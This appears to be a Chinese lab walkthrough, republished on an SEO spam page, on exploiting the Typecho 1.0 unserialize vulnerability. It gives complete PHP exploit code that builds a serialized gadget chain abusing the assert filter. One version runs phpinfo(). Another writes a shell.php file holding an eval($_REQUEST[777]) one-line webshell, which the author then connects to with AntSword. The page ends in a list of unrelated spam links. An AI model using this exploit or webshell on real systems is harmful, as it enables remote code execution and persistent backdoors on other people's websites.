当前位置: 首页 > news >正文

小程序怎么推广引流北京seo技术交流

小程序怎么推广引流,北京seo技术交流,巴中区建设局网站,百度做公司网站文章目录 执行phpinfogetshell 执行phpinfo 将下面这段代码复制到一个php文件&#xff0c;命名为typecho_1.0-14.10.10_unserialize_phpinfo.php&#xff0c;代码中定义的类名与typecho中的类相同&#xff0c;是它能识别的类&#xff1a; <?php class Typecho_Feed{const…

文章目录

  • 执行phpinfo
  • getshell

执行phpinfo

将下面这段代码复制到一个php文件,命名为typecho_1.0-14.10.10_unserialize_phpinfo.php,代码中定义的类名与typecho中的类相同,是它能识别的类:

<?php
class Typecho_Feed{const RSS1 = 'RSS 1.0';const RSS2 = 'RSS 2.0';const ATOM1 = 'ATOM 1.0';const DATE_RFC822 = 'r';const DATE_W3CDTF = 'c';const EOL = "\n";private $_type;private $_items;public function __construct(){$this->_type = $this::RSS2;$this->_items[0] = array('title' => '1','link' => '1','date' => 1508895132,'category' => array(new Typecho_Request()),'author' => new Typecho_Request(),);}
}class Typecho_Request{private $_params = array();private $_filter = array();public function __construct(){$this->_params['screenName'] = 'phpinfo()';$this->_filter[0] = 'assert';}
}$exp = array('adapter' => new Typecho_Feed(),'prefix' => 'typecho_'
);echo base64_encode(serialize($exp));
?>

将文件放到虚拟机C:\phpstudy_2016\WWW\unserialize的目录下,打开后可以获得它的base64编码:

在这里插入图片描述

在typecho主页用hackbar进行代码注入,注入成功就说明此处存在RCE漏洞:

在这里插入图片描述

注入成功(说明此处存在RCE漏洞,也可以尝试getshell),回显出phpinfo界面:

在这里插入图片描述

getshell

同上,将这段利用代码复制到php文件中:

<?php
class Typecho_Feed{const RSS1 = 'RSS 1.0';const RSS2 = 'RSS 2.0';const ATOM1 = 'ATOM 1.0';const DATE_RFC822 = 'r';const DATE_W3CDTF = 'c';const EOL = "\n";private $_type;private $_items;public function __construct(){$this->_type = $this::RSS2;$this->_items[0] = array('title' => '1','link' => '1','date' => 1508895132,'category' => array(new Typecho_Request()),'author' => new Typecho_Request(),);}
}class Typecho_Request{private $_params = array();private $_filter = array();public function __construct(){$this->_params['screenName'] = "fputs(fopen('shell.php', w), '<?php phpinfo();@eval(\$_REQUEST[777])?>')";$this->_filter[0] = 'assert';}
}$exp = array('adapter' => new Typecho_Feed(),'prefix' => 'typecho_'
);echo base64_encode(serialize($exp));
?>

打开:
在这里插入图片描述

在hackbar中执行:

在这里插入图片描述

页面回显正常:

在这里插入图片描述

在typecho根目录下已经成功写入一个shell.php文件,里面包含一句话木马,并可以正常访问:

在这里插入图片描述

蚁剑测试连接成功:

在这里插入图片描述

成功获取webshell:

在这里插入图片描述

http://www.shuangfujiaoyu.com/news/41003.html

相关文章:

  • 做招聘网站需要营业执照吗十大广告联盟
  • 大连承接网站制作常用的关键词挖掘工具有哪些
  • 阿里巴巴与慧聪网网站建设对比百度网盘下载速度
  • 营销存在的问题及改进优化seo方案
  • 如何将优酷视频上传到自己网站最近的新闻大事20条
  • 网络用户提要求找人帮忙做的网站百度新闻客户端
  • 兰州做网站公司中南建设集团有限公司
  • 佛山美容网站建设b站推广网站2023
  • 深圳外贸网站建设2022年明星百度指数排行
  • 邵阳哪里做网站网站建设的方法有哪些
  • 专业网站设计联系什么是论坛推广
  • 图片素材网站建设培训如何优化网站
  • 凡科轻站小程序制作平台营销网店推广的软文
  • wordpress多个函数文件网络优化大师手机版
  • 地图素材如何做ppt模板下载网站培训课
  • 利用wps做网站网站制作河南
  • 企业网站备案要求嘉兴seo报价
  • 什么是域名访问网站市场调研流程
  • 下列关于网站制作的2023年6月份又封城了
  • 北京装饰公司名录兰州网络推广关键词优化
  • 论坛网站建设公司企业网站推广渠道
  • 旅游网站系统建设ping站长工具
  • 公司一般有哪些部门seo搜索引擎排名优化
  • 泗阳做网站的网页搭建
  • 手机站网站建设大数据培训包就业靠谱吗
  • 天津做网站的网络公司中国免费网站服务器2020
  • php做网站视频播放下载功能seo云优化平台
  • 郑州网约车资格证seo文章关键词怎么优化
  • 如何做视频网站旗下账号网站优化排名易下拉系统
  • 做网络课堂的平台有哪些网站短视频排名seo